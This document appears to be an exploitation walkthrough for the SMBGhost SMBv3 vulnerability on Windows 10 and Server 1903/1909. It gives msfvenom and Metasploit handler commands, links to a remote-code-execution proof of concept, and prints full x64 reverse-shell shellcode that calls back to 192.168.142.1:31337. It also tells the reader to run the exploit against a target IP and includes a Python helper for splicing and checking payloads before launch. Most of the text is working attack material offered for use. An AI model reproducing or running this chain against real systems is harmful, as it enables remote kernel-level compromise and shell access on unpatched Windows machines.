Affected versions:
Windows 10 version 1903 for 32-bit systems
Windows 10 version 1903
Windows Server version 1903
Windows 10 version 1909 for 32-bit systems
Windows 10 version 1909
Windows Server version 1909
Detection tool (scanner):
https://github.com/ollypwn/SMBGhost
EXP:
https://github.com/chompie1337/SMBGhost_RCE_PoC
Using it with Metasploit:
msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o shellcode.txt
Replace USER_PAYLOAD in exploit.py with the generated shellcode (msfvenom's -v USER_PAYLOAD option names the output variable so the lines drop in as-is). Do not skip this step: the USER_PAYLOAD that ships in the PoC, reproduced below, is not a meterpreter bind_tcp stager. Its bytes embed a sockaddr_in for 192.168.142.1 port 31337 (\x02\x00\x7a\x69\xc0\xa8\x8e\x01) and the string "cmd", i.e. a reverse shell to that address, so running the exploit unmodified will never reach your handler. The payload is x64, so this path applies to the 64-bit targets in the list above.
USER_PAYLOAD = b""
USER_PAYLOAD += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
USER_PAYLOAD += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
USER_PAYLOAD += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
USER_PAYLOAD += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
USER_PAYLOAD += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
USER_PAYLOAD += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
USER_PAYLOAD += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
USER_PAYLOAD += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
USER_PAYLOAD += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
USER_PAYLOAD += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
USER_PAYLOAD += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
USER_PAYLOAD += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
USER_PAYLOAD += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
USER_PAYLOAD += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
USER_PAYLOAD += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
USER_PAYLOAD += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32"
USER_PAYLOAD += b"\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec"
USER_PAYLOAD += b"\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x7a\x69"
USER_PAYLOAD += b"\xc0\xa8\x8e\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41"
USER_PAYLOAD += b"\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01"
USER_PAYLOAD += b"\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50"
USER_PAYLOAD += b"\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48"
USER_PAYLOAD += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
USER_PAYLOAD += b"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9"
USER_PAYLOAD += b"\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02"
USER_PAYLOAD += b"\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41"
USER_PAYLOAD += b"\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a"
USER_PAYLOAD += b"\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01"
USER_PAYLOAD += b"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50"
USER_PAYLOAD += b"\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
USER_PAYLOAD += b"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86"
USER_PAYLOAD += b"\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08"
USER_PAYLOAD += b"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6"
USER_PAYLOAD += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a"
USER_PAYLOAD += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59"
USER_PAYLOAD += b"\x41\x89\xda\xff\xd5"
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 192.168.1.123    # target IP
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > exploit
Next:
Start the handler first (with a bind payload it keeps retrying the connection to the target until the port comes up), then change into the EXP directory and run the exploit against the target. The -ip argument is the target's address, the same host RHOST points at in the handler; use your target's address in both places (the two addresses in this write-up differ). The bug is a kernel memory corruption, so a failed attempt usually blue-screens the target and a retry is needed once it comes back.
python3 exploit.py -ip 192.168.31.124    # target IP
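As an added example (not code from the PoC or from the original post), a small Python helper that does the payload swap described above and checks the payload before you fire: it parses the msfvenom -f py output without exec(), decodes the sockaddr_in that Metasploit's x64 bind_tcp/reverse_tcp stubs load with a single `mov r12, imm64`, refuses a payload of the wrong kind, and rewrites the USER_PAYLOAD block. The exploit.py layout and the msfvenom sample text in the block are constructed stand-ins (the real exploit.py is assumed to lay out USER_PAYLOAD exactly as shown above); the sockaddr check is a heuristic for Metasploit's own x64 templates and nothing else. Run on the sockaddr fragment lifted from the shipped payload it reports a reverse shell to 192.168.142.1:31337, which is the point of checking.

```python
"""Check a msfvenom `-f py` payload and splice it into exploit.py's USER_PAYLOAD.

Added example, not part of SMBGhost_RCE_PoC. Assumes exploit.py lays out
USER_PAYLOAD as `USER_PAYLOAD = b""` followed by `USER_PAYLOAD += b"..."` lines;
the sockaddr heuristic assumes Metasploit's own x64 bind_tcp/reverse_tcp stubs.
"""
import re
import struct
from ipaddress import IPv4Address

# Metasploit's x64 bind_tcp and reverse_tcp blocks load the sockaddr_in with one
# `mov r12, imm64` (49 bc): AF_INET (02 00) | port, big-endian | IPv4 address.
# 0.0.0.0 means a bind payload. Assumption: holds for Metasploit templates only.
SOCKADDR_RE = re.compile(rb"\x49\xbc\x02\x00(.{2})(.{4})", re.DOTALL)

# Sockaddr bytes lifted from the USER_PAYLOAD that ships with the PoC (see above).
PAGE_SOCKADDR_FRAGMENT = b"\x49\xbc\x02\x00\x7a\x69\xc0\xa8\x8e\x01"

# Constructed stand-in for `msfvenom ... -f py` output: the usual prologue bytes
# followed by a bind sockaddr for 0.0.0.0:1234. Shape only, not working shellcode.
SAMPLE_MSFVENOM_OUTPUT = r'''buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += b"\x49\xbc\x02\x00\x04\xd2\x00\x00\x00\x00"
'''

# Constructed stand-in for exploit.py with the same USER_PAYLOAD block layout.
SAMPLE_EXPLOIT_SRC = r'''KERNEL_SHELLCODE = b"\x90"
USER_PAYLOAD = b""
USER_PAYLOAD += b"\x49\xbc\x02\x00\x7a\x69\xc0\xa8\x8e\x01"
USER_PAYLOAD += b"\x41\x89\xda\xff\xd5"

def exploit(ip):
    return len(USER_PAYLOAD)
'''

BYTES_LITERAL_RE = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})*)"')
USER_PAYLOAD_BLOCK_RE = re.compile(
    r'^USER_PAYLOAD = b""\n(?:USER_PAYLOAD \+= b"[^"\n]*"\n)*', re.MULTILINE)


def parse_msfvenom_py(text):
    """Join the b"\\x.." fragments msfvenom -f py emits into bytes, without exec()."""
    frags = BYTES_LITERAL_RE.findall(text)
    return b"".join(bytes.fromhex(f.replace("\\x", "")) for f in frags)


def describe_socket(payload):
    """Return ("bind"|"reverse", ip, port) from the embedded sockaddr_in, or None."""
    m = SOCKADDR_RE.search(payload)
    if m is None:
        return None
    (port,) = struct.unpack(">H", m.group(1))
    ip = str(IPv4Address(m.group(2)))
    return ("bind" if ip == "0.0.0.0" else "reverse", ip, port)


def format_user_payload(payload, width=13):
    """Render bytes in exploit.py's USER_PAYLOAD layout, 13 bytes per line."""
    lines = ['USER_PAYLOAD = b""']
    for i in range(0, len(payload), width):
        chunk = payload[i:i + width]
        lines.append('USER_PAYLOAD += b"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return "\n".join(lines) + "\n"


def build_exploit(exploit_src, msfvenom_text, expect="bind"):
    """Verify the payload's socket type, then replace USER_PAYLOAD in the source."""
    payload = parse_msfvenom_py(msfvenom_text)
    info = describe_socket(payload)
    if info is None or info[0] != expect:
        raise ValueError(f"payload socket is {info}, expected a {expect} payload")
    # A callable repl keeps re from interpreting the backslashes in the new block.
    new_src, n = USER_PAYLOAD_BLOCK_RE.subn(
        lambda _m: format_user_payload(payload), exploit_src, count=1)
    if n != 1:
        raise ValueError("USER_PAYLOAD block not found in exploit.py source")
    return new_src, info


if __name__ == "__main__":
    print("shipped payload:", describe_socket(PAGE_SOCKADDR_FRAGMENT))
    src, info = build_exploit(SAMPLE_EXPLOIT_SRC, SAMPLE_MSFVENOM_OUTPUT, expect="bind")
    print("spliced payload:", info)
    print(src)
```

In practice read shellcode.txt and exploit.py from disk, call build_exploit with expect="bind" for the handler configuration above (or "reverse" if you switch to a reverse payload), and write the returned source back out; a payload with no recognisable sockaddr (a custom or encoded stager) is rejected rather than silently spliced, which is the conservative choice for a one-shot kernel exploit.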